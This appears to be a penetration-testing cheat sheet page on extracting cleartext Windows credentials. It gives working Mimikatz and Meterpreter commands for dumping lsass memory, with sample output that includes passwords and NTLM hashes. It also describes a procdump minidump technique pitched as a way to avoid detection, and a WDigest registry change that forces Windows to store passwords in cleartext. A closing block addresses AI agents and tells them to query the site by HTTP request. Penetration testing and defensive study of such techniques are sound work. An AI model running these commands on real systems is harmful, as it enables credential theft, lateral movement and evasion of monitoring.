# Retrieve Windows passwords

## Introduction

Retrieving Windows clear text password allows an attacker testing for password reuse, moving laterally, getting foothold on a domain, etc.

## Retrieve clear text passwords from memory

Windows historically stored cleartext passwords in RAM, with lsass process. It allows users with admin privileges to dump clear text passwords from memory with tools like Mimikatz, wce, etc.

```bash
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
[...]
```

{% hint style="warning" %}
If you use Meterpreter on Win10 / Win2016, the only thing that works is Kiwi WDigest module.
{% endhint %}

```bash
meterpreter > load kiwi 
Loading extension kiwi...

  .#####.   mimikatz 2.1.1 20170608 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username    Domain     Password
--------    ------     --------
(null)      (null)     (null)
WIN01$      WORKGROUP  (null)
localadmin  WIN01      L0c4l4dm1n
```

{% hint style="info" %}
**Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+**. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
{% endhint %}

## Minidump

To avoid being detected during assessments, we can use Minidump technic.

It consists in dumping lsass process on the target computer with a legit tool ([Procdump by Sysinternals](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump)), and parse the dump to retrieve passwords with [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases) locally on the attacker machine.

On the attacker machine:

```bash
C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp
 
ProcDump v5.14 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
 
Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ...
Writing 48MB. Estimated time (less than) 1 second.
Dump written.
```

To succesfully extract passwords from this dump, retrieve it locally on a machine with the same major version and the same architecture than the victime machine.

![](/files/-LefcgB3Fjd_LtAO4WqI)

Then use Mimikatz:

```bash
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords
 
Authentication Id : 0 ; 141237
User Name         : sekur_000
Domain            : WINDOWS-8
        msv :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
        tspkg :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/
        wdigest :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/
```

{% hint style="success" %}
Since **Mimikatz Nostalgia** (2019/05/04), \
you can parse every dumps with every Windows version/architecture.
{% endhint %}

## WDigest

You can force Windows to store cleartext credentials in memory by simply modifying the value of the WDigest reg key. Clear text passwords will be stored anew once users connect again.

To enable it, change the key value to 1:

```bash
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
```

To disable it, change the key value to 0:

```bash
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 0
```

{% hint style="danger" %}
To take effect, conditions are required :

* Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
  * Adding requires **lock**
  * Removing requires **signout**
* Win10:
  * Adding requires **signout**
  * Removing requires **signout**
* Win2016:
  * Adding requires **lock**
  * Removing requires **reboot**
    {% endhint %}

## Lock, signout, and reboot from CMD

To lock a session, type:

```bash
rundll32.exe user32.dll,LockWorkStation
```

To signout, type:

```bash
query session
logoff <sessionToClose_Number>
```

To reboot, type:

```bash
shutdown /r /t 0
```

## References

* [harmj0y](https://www.harmj0y.net/blog/redteaming/)
* [The hacker playbook 3](http://thehackerplaybook.com/dashboard/)
* [GentilKiwi's blog](http://blog.gentilkiwi.com/securite/mimikatz/minidump)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/extracting-credentials/windows-clear-text-credentials.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.